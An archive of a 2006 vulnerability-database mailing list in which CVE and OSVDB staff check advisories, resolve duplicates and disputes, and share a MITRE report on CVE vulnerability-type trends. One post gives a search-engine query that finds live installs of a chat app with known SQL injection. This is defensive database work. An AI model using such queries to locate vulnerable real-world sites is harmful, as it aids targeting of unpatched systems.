From jericho at attrition.org Sun Oct 1 17:55:00 2006 From: jericho at attrition.org (security curmudgeon) Date: Sun, 1 Oct 2006 17:55:00 -0400 (EDT) Subject: [VIM] Armorize Vulnerability Database Message-ID: http://www.armorize.com/resources/vulnerability.php?Keyword=Armorize Armorize Vulnerability Database is a comprehensive library that allows you to effectively search web application vulnerability and automatically illustrates your search result in real time. -- Check out the chart below this. From coley at mitre.org Mon Oct 2 18:23:55 2006 From: coley at mitre.org (Steven M. Christey) Date: Mon, 2 Oct 2006 18:23:55 -0400 (EDT) Subject: [VIM] yblog: distributable product Message-ID: <200610022223.k92MNt9X015938@faron.mitre.org> Ref: Yblog => Cross Site Scripting http://www.securityfocus.com/archive/1/archive/1/447427/100/0/threaded found some source here: http://sourceforge.net/projects/y-blog/ With only a quick glance through the code, I was not able to verify the researcher's claims. For example, "action" is only referenced a few times in uss.php, apparently safely. However, I did not look extensively for things like variable overwrite or dynamic variable evaluation issues. - Steve From coley at linus.mitre.org Mon Oct 2 18:43:21 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 2 Oct 2006 18:43:21 -0400 (EDT) Subject: [VIM] WebspotBlogging => 3.0 Remote File Include Vulnerabilities (fwd) Message-ID: A Root3r_H3ll rediscovery... ---------- Forwarded message ---------- Date: Mon, 2 Oct 2006 18:42:28 -0400 (EDT) From: Steven M. Christey To: h4ck3riran at yahoo.com, bugtraq at securityfocus.com Subject: Re: WebspotBlogging => 3.0 Remote File Include Vulnerabilities These vectors were previosuly reported in June 2006 (CVE-2006-2860) by Kacper in a milw0rm post (http://milw0rm.com/exploits/1871), for version 3.0.1. >> Www.Site.coM/[Path]/inc/mainheder.inc.php This appears to be a mis-spelling of "mainheader.inc.php". - Steve From heinbockel at mitre.org Tue Oct 3 12:53:42 2006 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Tue, 3 Oct 2006 12:53:42 -0400 Subject: [VIM] Concerning CSRF in phpMyAdmin 2.9.0.1 (CVE-2006-5116) Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0136B20B@IMCSRV5.MITRE.ORG> >-----Original Message----- >From: Stefan Esser [sesser (at) hardened-php (dot) net] >Sent: Dienstag, 3. Oktober 2006 12:36 >To: Heinbockel, Bill >Subject: Re: Question regarding the CSRF in phpMyAdmin > > >Hello, >> Regarding the advisory: >> Advisory 07/2006: phpMyAdmin Multiple CSRF Vulnerabilities >> >> Is this the same issue mentioned by the phpMyAdmin changelog >> for 2.9.1-rc1, which mentions "2006-09-27 ... >libraries/common.lib.php, >> >> /session.inc.php, /url_generating.lib.php: security fixes >(announcement >> >> will come later), thanks to Sebastian Mendel and Stefan Esser." >> >It is the same issue? Yes and no... The fixes in 2.9.1-rc1 were not >fixing all issues I reported (correctly). It is still >vulnerable to some >of the attacks I found. After they released rc1 they decided >to not call >the next release 2.9.1 but to call it 2.9.0.1. I guess this is the >reason for the confusion. > >However 2.9.1-rc1 is STILL vulnerable to some of the issues reported in >my advisory. > >Stefan > The phpMyAdmin changelog issue was assigned CVE-2006-5116. Another CVE will be published for the issues not addressed in the 2.9.1-rc1 release. ====================================================================== CVE-2006-5116 Multiple unspecified vulnerabilities in phpMyAdmin before 2.9.1-rc1 have unspecified impact and attack vectors, related to (1) libraries/common.lib.php, (2) session.inc.php, and (3) url_generating.lib.php. Ref: CONFIRM:http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.9.1- rc1.tar.gz?download Ref: BID:20253 Ref: SECUNIA:22126 William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From coley at linus.mitre.org Tue Oct 3 13:15:07 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 3 Oct 2006 13:15:07 -0400 (EDT) Subject: [VIM] About CVE-2005-4481 (dispute) (fwd) Message-ID: FYI, I think this was already forwarded here or elsewhere, but just in case. - Steve ---------- Forwarded message ---------- Date: Tue, 03 Oct 2006 15:11:13 +0200 From: "[ISO-8859-1] J?rgen Rydenius" To: cve at mitre.org Cc: nvd at nist.gov Subject: About CVE-2005-4481 (dispute) Hi. CVE-2005-4481 is concerned with "XSS vulnerability in Polopoly 9 and earlier". I have some more information about this issue: 1. The XSS flaw described was only part of the custom implementation of the http://www.polopoly.com/ site. It was never part of any version of any Polopoly product, nor delivered to any of Polopoly's customers. 2. The XSS flaw that existed (the search form in the upper right corner) on the www.polopoly.com site has been fixed. 3. When www.polopoly.com had the XSS flaw it was based on Polopoly 8.6. Polopoly 9.x was never involved what so ever in this issue. And as I said earlier, the flaw was not part of Polopoly 8.6 either, it was only in custom implementation code of the www.polopoly.com site. 4. The www.polopoly.com site is not personalized nor permission controlled, so there was no information of any value to steal by exploiting the XSS flaw. Regards, J?rgen Rydenius (Polopoly employee) -- J?rgen Rydenius Polopoly - Cultivating the information garden Kungsgatan 88, SE-112 27 Stockholm, SWEDEN From coley at mitre.org Tue Oct 3 20:49:50 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 3 Oct 2006 20:49:50 -0400 (EDT) Subject: [VIM] Cool Cafe' product found - mostly Message-ID: <200610040049.k940noFx012228@faron.mitre.org> See CVE's below. OSVDB:17349 and OSVDB:17350 had marked these issues as myth/fake, saying there was no info on the product, and it might have been site-specific. I dug into this a little more, because morning wood was the researcher. A couple inurl: queries later, and it looks like there's some product *somewhere* that at least used to be distributed at coolcafe.ca (not any more), that has been hacked by some defacers on in-the-wild sites. Proper spelling: Cool Caf?! (by the way, has anybody figured out how to handle all the different language/charsets/encodings in their database? I just paste and pray) Google search: inurl:"coolcafe/login.asp" You can narrow it down a little more if you add "defaced" or "owned" into your query. It appears to be just a chat utility, no clear association with restaurants besides its name. - Steve ====================================================== Name: CVE-2005-2035 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2035 Acknowledged: yes advisory/yes followup/yes changelog/yes/unknown discloser-claimed/unknown vague/unknown/no disputed/no Announced: 20050616 Flaw: sql-inject Reference: FULLDISC:20050616 CoolCafe Chat SQL injection Reference: URL:http://seclists.org/lists/fulldisclosure/2005/Jun/0205.html Reference: MISC:http://exploitlabs.com/files/advisories/EXPL-A-2005-009-coolcafe.txt Reference: OSVDB:17349 Reference: URL:http://www.osvdb.org/17349 Reference: SECTRACK:1014221 Reference: URL:http://securitytracker.com/id?1014221 SQL injection vulnerability in login.asp for Cool Cafe (Cool Caf?) Chat 1.2.1 allows remote attackers to execute arbitrary SQL commands via the password. Analysis: INCLUSION: at first glance, this does not appear to be a valid product, but a Google search for inurl:"coolcafe/login.asp" yields a number of results. ====================================================== Name: CVE-2005-2036 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2036 Acknowledged: yes advisory/yes followup/yes changelog/yes/unknown discloser-claimed/unknown vague/unknown/no disputed/no Announced: 20050616 Flaw: form-field Reference: FULLDISC:20050616 CoolCafe Chat SQL injection Reference: URL:http://seclists.org/lists/fulldisclosure/2005/Jun/0205.html Reference: MISC:http://exploitlabs.com/files/advisories/EXPL-A-2005-009-coolcafe.txt Reference: OSVDB:17350 Reference: URL:http://www.osvdb.org/17350 modifyUser.asp in Cool Cafe (Cool Caf?) Chat 1.2.1 allows remote attackers to obtain the administrator password and email address via a modified nickname value. Analysis: INCLUSION: at first glance, this does not appear to be a valid product, but a Google search for inurl:"coolcafe/login.asp" yields a number of results. From sullo at cirt.net Tue Oct 3 21:00:05 2006 From: sullo at cirt.net (Sullo) Date: Tue, 03 Oct 2006 21:00:05 -0400 Subject: [VIM] Cool Cafe' product found - mostly In-Reply-To: <200610040049.k940noFx012228@faron.mitre.org> References: <200610040049.k940noFx012228@faron.mitre.org> Message-ID: <45230795.2090505@cirt.net> Steven M. Christey wrote: > See CVE's below. > > OSVDB:17349 and OSVDB:17350 had marked these issues as myth/fake, > saying there was no info on the product, and it might have been > site-specific. I dug into this a little more, because morning wood > was the researcher. A couple inurl: queries later, and it looks like > there's some product *somewhere* that at least used to be distributed > at coolcafe.ca (not any more), archive.org has some mirrors of the old site (http://web.archive.org/web/*/http://coolcafe.ca). http://web.archive.org/web/20010607125917/www.coolcafe.ca/V3/index.asp "Cool Caf? is a free ASP chat application that can be fully customized to the look of your web site. " From jericho at attrition.org Tue Oct 3 21:01:40 2006 From: jericho at attrition.org (security curmudgeon) Date: Tue, 3 Oct 2006 21:01:40 -0400 (EDT) Subject: [VIM] Cool Cafe' product found - mostly In-Reply-To: <45230795.2090505@cirt.net> References: <200610040049.k940noFx012228@faron.mitre.org> <45230795.2090505@cirt.net> Message-ID: : > See CVE's below. : > : > OSVDB:17349 and OSVDB:17350 had marked these issues as myth/fake, : > saying there was no info on the product, and it might have been : > site-specific. I dug into this a little more, because morning wood : > was the researcher. A couple inurl: queries later, and it looks like : > there's some product *somewhere* that at least used to be distributed : > at coolcafe.ca (not any more), : : archive.org has some mirrors of the old site : (http://web.archive.org/web/*/http://coolcafe.ca). : : http://web.archive.org/web/20010607125917/www.coolcafe.ca/V3/index.asp : "Cool Caf? is a free ASP chat application that can be fully customized : to the look of your web site. " The night I dig into this, archive.org did not have any archives of the site available... From coley at linus.mitre.org Wed Oct 4 19:14:48 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 4 Oct 2006 19:14:48 -0400 (EDT) Subject: [VIM] Vulnerability Type Distributions in CVE Message-ID: (note: this mailing list post should include an attachment with HTML versions of the tables in this paper. The URL for the permanent web page is given below.) ========================================================== Vulnerability Type Distributions in CVE ========================================================== Author: Steve Christey Date: October 4, 2006 Document version: 1.0 URL: http://cwe.mitre.org/documents/vuln-trends.html This is a draft report and does not represent an official position of The MITRE Corporation. Copyright (c) 2006, The MITRE Corporation. All rights reserved. Permission is granted to redistribute this document if this paragraph is not removed. This document is subject to change without notice. ============================= ===== Table of Contents ===== ============================= Introduction Summary of Results Data Sets Trend Table Color Key Table 1 Analysis: Overall Trends Table 2 and 3 Analysis: OS vs. non-OS Table 4 Analysis: Open and Closed Source Possible Future Work Notes on Potential Bias (In)Frequently Asked Questions Credits References Flaw Terminology Table 1: Overall Results Table 2: OS Vendors Table 3: OS Vendors vs. Others Table 4: Open and Closed Source (OS vendors) ======================== ===== Introduction ===== ======================== For the past 5 years, CVE has been tracking the types of errors that lead to publicly reported vulnerabilities, and periodically reporting trends on a limited scale. In support of the Common Weakness Enumeration (CWE) project [1], and as a result of the interest in this work as mentioned during the "Year of the web application: Hack & Data from the Front lines" panel at the 5th Annual Cyber Security Executive Summit in New York City on September 13, 2006, we have published a more extensive analysis. An updated version will be released once 2006 is complete. The primary goal of this study is to better understand research trends using publicly reported vulnerabilities. It should be noted that the data is obtained from an uncontrolled population, i.e., decentralized public reports from a research community with diverse goals and interests, with an equally diverse set of vendors and developers. More specialized, exhaustive, and repeatable methods could be devised to evaluate software security. But until such methods reach maturity and widespread acceptance, the overall state of software security can be viewed through the lens of public reports. ============================== ===== Summary of Results ===== ============================== 1) The total number of publicly reported web application vulnerabilities has risen sharply, to the point where they have overtaken buffer overflows. This is probably due to ease of detection and exploitation of web vulnerabilities, combined with the proliferation of low-grade software applications. In 2005 and 2006, cross-site scripting (XSS) was number 1, and SQL injection was number 2. PHP remote file inclusion is number 3 in 2006; because it allows arbitrary code execution on a vulnerable server, this is a worrisome trend, although proper configuration is frequently enough to eliminate it. 2) Buffer overflows are still the number 1 issue as reported in operating system (OS) vendor advisories. XSS is still high in this category, at number 2 in 2005 and number 3 in 2006, although other web application vulnerabilities appear much less frequently. 3) Integer overflows, barely in the top 10 overall in the past few years, are in the top 3 for OS vendor advisories. This might indicate expert researcher interest in high-profile software. 4) There are noticeable differences in the types of vulnerabilities being reported in open and closed source OS vendor advisories. These merit further investigation because they might reflect important differences in development, research, and disclosure practices. 5) The data is inconclusive regarding whether there is a concrete improvement in overall software security. While there is a rise in "new" vulnerability classes, the raw numbers for older classes have not changed significantly. Further investigation is also required in this area. ===================== ===== Data Sets ===== ===================== Three main data sets were used in this analysis. OVERALL: this data set consists of all CVEs that were first publicly reported in 2001 or later (earlier CVEs do not have the appropriate fields filled out.) CVE includes all types of software, whether from a major vendor or an individual hobbyist programmer, as long as the associated vulnerability has been reported by the developer or posted by a researcher or third party to sources such as mailing lists and vulnerability databases. CVE only includes distributable software, i.e., it does not include issues that are reported for custom software in specific web sites. While CVE data is incomplete, it is estimated that it is 80% complete relative to all major mailing lists and vulnerability databases, with the likely exception of data from 2003. OS VENDOR: this data set identifies CVEs that are associated with operating system (OS) vendor advisories, which would capture vulnerabilities in the kernel, as well as applications that are supported by the OS vendor. The data was limited to CVEs that have one or more references from the following sources. For open source OS vendors, the following sources were used: DEBIAN, FREEBSD, MANDRAKE/MANDRIVA, NETBSD, OPENBSD, REDHAT, and SUSE. The closed source OS vendors included: AIXAPAR, APPLE, CISCO, HP, MS, MSKB, SCO, SGI, SUN, and SUNALERT. CVE does not have the internal data fields to support more fine-grained analysis for major non-OS vendors. OPEN/CLOSED SOURCE: open and closed source operating system (OS) vendors were using the same methods and categories as described in the "OS VENDOR" section. Because some closed source vendors such as Apple have significant codebase overlap with open source products, any overlapping CVEs were removed from the data set. Both open and closed sets had at least 1700 vulnerabilities. In each data set, vulnerabilities were not removed if they were marked as "disputed." Many disputes are incorrect or unresolved. ================================= ===== Trend Table Color Key ===== ================================= In the HTML pages, the following color key is used for trend tables. GRAY: used in comparisons to help visually separate one data set from another RED: a top 10 for that year GREEN: during that year, the vulnerability's rank was at least 5 points BELOW the average rank for that vulnerability YELLOW: during that year, the vulnerability's rank was at least 5 points ABOVE the average rank for that vulnerability So, green on the left indicates vulns with RISING popularity, as will yellow on the right. Green on the right indicates vulns with FALLING popularity, as will yellow on the left. ============================================ ===== Table 1 Analysis: Overall Trends ===== ============================================ The most notable trend is the sharp rise in public reports for vulnerabilities that are specific to web applications. Buffer overflows were number 1 year after year, but that changed in 2005 with the rise of web application vulnerabilities, including cross-site scripting (XSS), SQL injection, and remote file inclusion, although SQL injection is not limited just to web applications. In fact, so far in 2006, buffer overflows are only #4. There are probably several contributing factors to this increase in web vulnerabilities: 1) The most basic data manipulations for these vulnerabilities are very simple to perform, e.g., "'" for SQL injection and "" for XSS. This makes it easy for beginning researchers to quickly test large amounts of software. 2) There is a plethora of freely available web applications. Much of the code is alpha or beta, written by inexperienced programmers with easy-to-learn languages such as PHP, and distributed on high-traffic sites. The applications might have a small or non-existent user base. Such software is often rife with easy-to-find vulnerabilities, and it is often a target for beginning researchers. The large number of these "fish-in-a-barrel" applications is probably a major contributor to the overall trends. 3) With XSS, every input has the potential to be an attack vector, which does not occur with other vulnerability types. This leaves more opportunity for a single mistake to occur in a program that otherwise protects against XSS. SQL injection also has many potential attack vectors. 4) Despite popular opinion that XSS is easily prevented, it has many subtleties and variants. Even solid applications can have flaws in them; consider non-standard browser behaviors that try to "fix" malformed HTML, which might slip by a filter that uses regular expressions. Finally, until early 2006, the PHP interpreter had a vulnerability in which it did not quote error messages, but many researchers only reported the surface-level "resultant" XSS instead of figuring out whether there was a different "primary" vulnerability that led to the error. 5) There is some evidence that over the past couple of years, web defacers have taken an interest in performing and publishing their own research. This is probably due to the ease of finding vulnerabilities, combined with the presence of high-risk problems such as PHP file inclusion, which can be used to remotely install powerful, easily-available backdoor code. Based on customer posts to numerous vendor forums, there is solid evidence that remote file inclusion is regularly used to compromise web servers, which also helps to explain its popularity. Overall Trends: Other Interesting Results ----------------------------------------- 1) For 2006, the top 5 vulnerability types are responsible for 57% of all CVEs. With over 35 vulnerability types used in this report, and dozens more as currently identified in CWE, this shows how most public reports concentrate only on a handful of vulnerability types. 2) PHP remote file inclusion (php-include) has been steadily gaining ground since 2001, enough so that it is number 3 at this point in 2006. See items (2) and (5) from the previous section for a possible explanation. 3) Over the years, there has been a noticeable decline in shell metacharacters, symbolic link following, and directory traversal. It is unclear whether software is actually improving with respect to these problems, or if they are not investigated as frequently. 4) Information leaks (infoleak) appear regularly. There are 2 main reasons for the prominence: "information leak" is a more general class than others (see CWE for more precise sub-categories), and when an error message includes a full path, that is usually categorized as an information leak, although it might be resultant from a separate primary vulnerability. 5) The inability to handle malformed inputs (dos-malform), which usually leads to a crash or hang, is also a general class. Malformed-input vulnerabilities have not been studied as closely as injection vulnerabilities, at least with respect to identifying the root cause of the problem. Also, many reports do not specify how an input is malformed. There are likely many cases in which a researcher accidentally triggers a more serious vulnerability but does not perform sufficient diagnosis to determine the primary issue. Finally, vendor reports might only identify an issue as being related to "malformed input," which obscures the primary cause. 6) As the percentage of buffer overflows has declined, there has been an increase in related vulnerability types, including integer overflows (int-overflow), signedness errors, and double frees (double-free). These are still very low-percentage, probably due to their relative newness and difficulty of detection compared to classic overflows. In addition, these newly emerging vulnerability types might be labeled as buffer overflows, since they often lead to buffer overflows, and the "buffer overflow" term is used interchangeably for attack, cause, and effect. 7) Other interesting web application vulnerabilities are webroot (storage of sensitive files under the web document root), form-field (web parameter tampering), upload of files with executable extensions (e.g., file.php.gif), eval injection, and Cross-Site Request Forgery (CSRF). ================================================== ===== Table 2 and 3 Analysis: OS vs. non-OS ====== ================================================== Given the increase in web application vulnerabilities and the likelihood that it is partially due to researcher interest in software with small user bases, an analysis was performed based solely on advisories from operating system (OS) vendors. These advisories frequently include the OS kernel and key applications that are supported by the vendor. See the Data Sets section for more information. Unfortunately, more precise data sets could not be generated. Table 2 provides the data for OS vendor advisories alone. Table 3 contrasts the OS vendor advisories with all other reported issues. There are several notable results: 1) Integer overflows are heavily represented in OS vendor advisories, rising to number 2 so far in 2006, even though they represent a small percentage of vulnerabilities overall. This probably reflects growing interest by expert researchers in finding integer overflows, along with the tendency of expert researchers to evaluate widely deployed software. The affected software ranges widely, including the kernel, cryptographic modules, and multimedia file processors such as image viewers and music players. After 2004, many of the reported issues occur in libraries or common DLLs. 2) Buffer overflows are still #1. This is probably due to under-representation of web applications in OS advisories, relative to other CVEs. In addition, as related issues like integer overflows increase, they might be detected or reported as buffer overflows, since buffer overflows are frequently resultant from integer overflows. 3) XSS is still very common, even in OS advisories, and it appears with the same frequency as integer overflows in 2006. An informal analysis shows that the affected software includes web servers, web browsers, email clients, administrative interfaces, and Wiki/CMS. 4) With the exception of XSS, there is a wide gulf between web-related vulnerabilities in OS advisories and other issues. SQL injection is not even in the top 10 for OS advisories, and PHP remote file inclusion is practially nonexistent. Many other web-related vulnerabilities occupy the bottom of the chart. For SQL injection, it is possible that most OS-supported applications do not use databases, or aren't web accessible. SQL injection vulnerabilities are not web-specific, but it seems that they are rarely reported for non-web applications, so it is possible that this reflects some researcher bias. 5) Directory traversal and format string vulnerabilities are frequently reported at a higher rate in OS vendor advisories than elsewhere. The reason is unclear, because these vulnerabilities are not restricted to local attack vectors, so one might expect that they would also appear regularly in web applications. However, it is likely that researchers do not focus on format strings because they are rarely exploitable for code execution in languages other than C. In the case of PHP, many PHP functions are subject to both remote file inclusion and directory traversal, and it might be that only the file inclusion is publicly reported. (In fact, the overlap is so close that this sometimes causes difficulties with classification). 6) In 2006 so far, more than a quarter (27%) of the OS vendor advisories did not have sufficient details to actually classify the vulnerability (type "unk"). This is in sharp contrast to the non-OS issues, which comprise less than 8%. However, because of the data sets in question, the non-OS CVEs will include many non-coordinated disclosures that would, by their nature, require more details. The next table will demonstrate that it is not just closed source vendor advisories that omit sufficient details for vulnerability classification. 7) The "top 5" and "top 10" vulnerabilities in each year are a much smaller percentage of total vulnerabilities in OS vendor advisories than non-OS issues. For example, in 2005, the top 5 totaled 29.4% for OS issues, but 55% for non-OS. For OS issues, this suggests an increasing diversity in the kinds of vulnerabilities being reported, whereas for other issues, that diversity appears to be decreasing. However, this could be another reflection of the domination of web application vulnerabilities. ==================================================== ===== Table 4 Analysis: Open and Closed Source ===== ==================================================== Table 4 compares the vulnerability type distribution between the open source and closed source operating system (OS) vendors. See the "Data Sets" section for more information on how the data sets were generated. As a reminder, CVEs that overlapped both open and closed source sets were omitted. IMPORTANT: it is inappropriate to use these results to compare the relative security of open and closed source products, so the report excludes raw numbers. Both sets had at least 1700 vulnerabilities. There are too many variations in vendor advisory release policies, possible differences in research techniques, and other factors cited in [2]. And, simply put, there is too much potential for raw numbers to be misused and misinterpreted. However, some results pose interesting questions that merit more in-depth investigation. These discrepancies might reflect differences in vulnerability research techniques, researcher sub-communities, vendor disclosure policies, and development practices and APIs, but this has not been proven. The research and vendor communities are encouraged to investigate the underlying causes for these differences, which could provide lessons learned for all software developers, open and closed source alike. Some of the most notable results are: 1) The percentage of "unknown" vulnerabilities - those that could not be classified due to lack of details - is significantly higher in closed source than open source advisories, and 45% so far for 2006. With such a wide discrepancy, it is difficult to know whether any of the remaining results in this section are significant. It should be noted that 10% of issues in open source advisories do not have enough details to classify the problem. 2) Buffer overflows are number 1 for both open and closed, with roughly the same percentage over the years. 3) Symbolic link vulnerabilities appear at a higher rate in open source than closed source, although this might be due to the non-Unix OSes in the data set. While Windows has "shortcuts" (.LNK) that are similar to Unix links, they appear very rarely in Microsoft advisories, or for Windows-based applications. It is not clear whether this is due to under-research or API/development differences. The author recalls that at least one Linux researcher appeared to concentrate on symbolic link issues in 2004 and 2005, so researcher bias might also be a factor. 4) Malformed-input vulnerabilities appear more frequently in closed source advisories than open source. This might be due to a lack of details in closed source advisories. If an advisory mentions a problem due to "malformed data," it might be assigned the dos-malform type. Another factor might be due to black box techniques. It seems likely that fuzzers and other tools would be used more frequently against closed source products than open source, but this is not known. 5) XSS vulnerabilities appear more frequently in open source advisories than closed, but this might be a reflection of vendor release policies for advisories. It seems that open source vendors are more likely to release advisories for smaller packages. 6) Format string vulnerabilities appear more frequently in open source. There are probably several factors. First, susceptible API library calls such as printf() are easily found in source code using crude methods, whereas binary reverse engineering techniques are not conducted by many researchers (this might also be an explanation for symbolic link issues). Second, many format string problems seem to occur in rarely-triggered error conditions, which makes them more difficult to test with black box methods. Perhaps most surprising: it appears that, since 2003, the non-Unix closed source advisories have not mentioned any format strings. It is not clear why there would be such a radical difference, although it could be due to the lack of details in those advisories. 7) Integer overflows have been roughly the same rank for open and closed source. This is a curious similarity, since one might not expect open and closed source analysis techniques to be equally capable in finding these problems. 8) Another interesting example is in the use of default passwords. Over the years, very few open source vendor advisories have mentioned default passwords, whereas they appear with some regularity in closed source advisories. It is not clear whether this is a difference in shipping/configuration practices or vendor disclosure policies. 9) Shell metacharacter issues appear less frequently in non-Unix closed source than other closed source advisories. This result was found by a separate analysis; it is not evident in Table 4. This could be due to usage patterns of API functions such as CreateProcess() for Windows, and system() for Unix. This result is being reported because it is the most concrete example of how API functions might play a role in implementation-level vulnerabilities. ================================ ===== Possible Future Work ===== ================================ 1) The vulnerability types could be tied to other CVE-normalized data, such as IDS, incident databases, or vulnerability scanning results. This could determine the types of vulnerabilities that are being actively exploited or detected in real-world enterprises. 2) More precise classification could be informative. Approximately 30% of CVEs have vulnerability types that cannot be described using the current classification scheme. Another 15% are "unknown" vulnerabilities whose disclosures do not have sufficient details to determine any vulnerability type, but this problem is unavoidable, since some vendors do not release these details. 3) A crude measure of researcher diversity might be possible by linking data to other vulnerability databases that record this information. This could be used to determine if the raw number of researchers is increasing (probably), how that rate is increasing relative to the number of vulnerabilities (unknown), and how many different bug types are found by the average researcher (probably fairly small). If such data is available, then a further breakdown could be performed based on professional researchers versus others. 4) More precise data sets could be identified, such as a cross-section of market leaders in various product categories, not just OS vendor advisories. CVE does not record this type of information. =================================== ===== Notes on Potential Bias ===== =================================== The diversity of both researchers and vendor disclosure practices introduces several unmeasurable biases, as described in more detail in [2]. In the overall results, 2003's issues have 20% with vulnerabilities that are "not specified" by the CVE analyst, which is inconsistent with statistics from other years. Many of these vulnerabilities were reviewed after this discovery, and they are in fact of type "other." This discrepancy has not been sufficiently explained, although it is probably at least partially due to the relative percentage of CVEs in OS vendor advisories to other CVEs, since 2003 was a low-output year for CVE and thus the concentration was in high-priority software. Some vulnerability types are probably under-represented due to classification difficulty. For example, the "form-field" type (web parameter tampering) might occasionally get classified as an authentication error, depending on how the original researcher reports the issue. ========================================== ===== (In)Frequently Asked Questions ===== ========================================== 1) Why aren't you giving out raw numbers for open vs. closed source? Answer: we already said why. See paragraph 2 of the Table 4 analysis for a reminder. 2) Why are you releasing this report now, with incomplete 2006 data? Answer: when MITRE mentioned the preliminary results at the Cyber Security Executive Summit on September 13, there was a lot more interest than we had originally anticipated. Subsequent discussion of the results might help us to provide a better report when 2006 is done. 3) How does this compare with the other summaries you've posted in the past? Why have the numbers and percentages changed for older years? Answer: (1) we occasionally add CVEs for older issues, (2) some of the previously released summaries were cumulative instead of offering a year-by-year breakdown, and (3) eventually, as a new type of vulnerability is reported more frequently, the CVE project notices it enough to give it a name, or at least a type. Once we do that, we can go back and update the older CVEs that also had the issue. However, we often rely on keyword searches in CVE descriptions for doing these kinds of updates. The earliest reports of new vulnerability types probably don't get captured fully, because CVE descriptions frequently vary in the early days or months of a new vulnerability type. Most updates to these vulnerability trends trigger an informal review of the "other" vulnerabilities for the data set in order to update the type fields. 4) There are a lot more vulnerability types than what you've covered. Answer: That's an observation, not a question. If a certain vulnerability type is not on the list, then it probably didn't appear frequently enough for the CVE project to track closely. There are several reasons: (1) the vulnerability type is selected from a large dropdown menu during CVE refinement, but also (2) our work in the Common Weakness Enumeration (CWE) is producing hundreds of vuln types, and we want that to become a little more stable before doing the next round of modifications to CVE data. Finally, (3) with approximately 3,500 vulnerabilities marked "other" or "not specified", it is cost-prohibitive to review each CVE when the set of categories is updated. 5) Why isn't my favorite web vulnerability here? Answer: Many web vulnerabilities are difficult to classify because they are "multi-factor," i.e., they are composed of multiple bugs, weaknesses, and/or design limitations. Other web issues are really just specialized attacks that use other primary vulnerabilities. For example, most HTTP response splitting problems rely on CRLF injection, so they are classified under CRLF injection. =================== ===== Credits ===== =================== Large-scale trend analyses like this are not possible without the body of knowledge that has been formed by hundreds or thousands of researchers, from hobbyists to professionals. Thanks to the following for substantive feedback on the initial draft, sometimes in the form of a question that required more investigation: Bill Heinbockel, Chris Wysopal, and Mark Curphey. ====================== ===== References ===== ====================== [1] CWE, http://cwe.mitre.org [2] "Open Letter on the Interpretation of 'Vulnerability Statistics'" Bugtraq, Full-Disclosure January 5, 2006 http://lists.grok.org.uk/pipermail/full-disclosure/2006-January/041028.html ============================ ===== Flaw Terminology ===== ============================ Type: auth CWE: CWE-289, CWE-288, CWE-302, CWE-305, CWE-294, CWE-290, CWE-287, CWE-303 Description: Weak/bad authentication problem Type: buf CWE: CWE-119, CWE-120, others Description: Buffer overflow Type: CF CWE: none Description: General configuration problem, not perm or default Type: crlf CWE: CWE-93 Description: CRLF injection Type: crypt CWE: CWE-310, CWE-311, CWE-347, CWE-320, CWE-325 Description: Cryptographic error (poor design or implementation), including plaintext storage/transmission of sensitive information. Type: CSRF CWE: CWE-352 Description: Cross-Site Request Forgery (CSRF) Type: default CWE: N/A Description: Insecure default configuration, e.g., passwords or permissions Type: design CWE: none Description: Design problem, generally in protocols or programming languages. Since 2005, its use has been limited due to the highly general nature of this type. Type: dos-flood CWE: CWE-400 Description: DoS caused by flooding with a large number of *legitimately formatted* requests/etc.; normally DoS is a crash, or spending a lot more time on a task than it "should" Type: dos-malform CWE: CWE-238, CWE-234, CWE-166, CWE-230, many others Description: DoS caused by malformed input Type: dos-release CWE: CWE-404 Description: DoS because system does not properly release resources Type: dot CWE: CWE-22, CWE-23, CWE-36 Description: Directory traversal (file access via ".." or variants) Type: double-free CWE: CWE-415 Description: Double-free vulnerability Type: eval-inject CWE: CWE-95 Description: Eval injection Type: form-field CWE: CWE-472 Description: CGI program inherently trusts form field that should not be modified (i.e., should be stored locally) Type: format-string CWE: CWE-134 Description: Format string vulnerability; user can inject format specifiers during string processing. Type: infoleak CWE: CWE-205, CWE-212, CWE-203, CWE-209, CWE-207, CWE-200, CWE-215, others Description: Information leak by a product, which is not the result of another vulnerability; typically by design or by producing different "answers" that suggest the state; often related to configuration / permissions or error reporting/handling. Type: int-overflow CWE: CWE-190 Description: A numeric value can be incremented to the point where it overflows and begins at the minimum value, with security implications. Overlaps signedness errors. Type: link CWE: CWE-61, CWE-64 Description: Symbolic link following Type: memleak CWE: CWE-401 Description: Memory leak (doesn't free memory when it should); use this instead of dos-release Type: metachar CWE: CWE-78 Description: Unescaped shell metacharacters or other unquoted "special" char's; currently includes SQL injection but not XSS. Type: msdos-device CWE: CWE-67 Description: Problem due to file names with MS-DOS device names. Type: not-specified CWE: none Description: The CVE analyst has not assigned a flaw type to the issue, typically similar to "other". Type: other CWE: none Description: Other vulnerability; issue could not be described with an available type at the time of analysis. Type: pass CWE: CWE-259 Description: Default or hard-coded password Type: perm CWE: CWE-276 Description: Assigns bad permissions, improperly calculates permissions, or improperly checks permissions Type: php-include CWE: CWE-98 Description: PHP remote file inclusion Type: priv CWE: CWE-266, CWE-274, CWE-272, CWE-250, CWE-264, CWE-265, CWE-268, CWE-270, CWE-271, CWE-269, CWE-267 Description: Bad privilege assignment, or privileged process/action is unprotected/unauthenticated. Type: race CWE: CWE-362, CWE-366, CWE-364, CWE-367, CWE-421, CWE-368, CWE-363, CWE-370 Description: General race condition (NOT SYMBOLIC LINK FOLLOWING (link)!) Type: rand CWE: CWE-330, CWE-331, CWE-332, CWE-338, CWE-342, CWE-341, CWE-339, others Description: Generation of insufficiently random numbers, typically by using easily guessable sources of "random" data Type: relpath CWE: CWE-426, CWE-428, CWE-114 Description: Untrusted search path vulnerability - Relies on search paths to find other executable programs or files, opening up to Trojan horse attacks, e.g., PATH environment variable in Unix. Type: sandbox CWE: CWE-265 Description: Java/etc. sandbox escape - NOT BY DOT-DOT! Type: signedness CWE: CWE-195, CWE-196 Description: Signedness error; a numeric 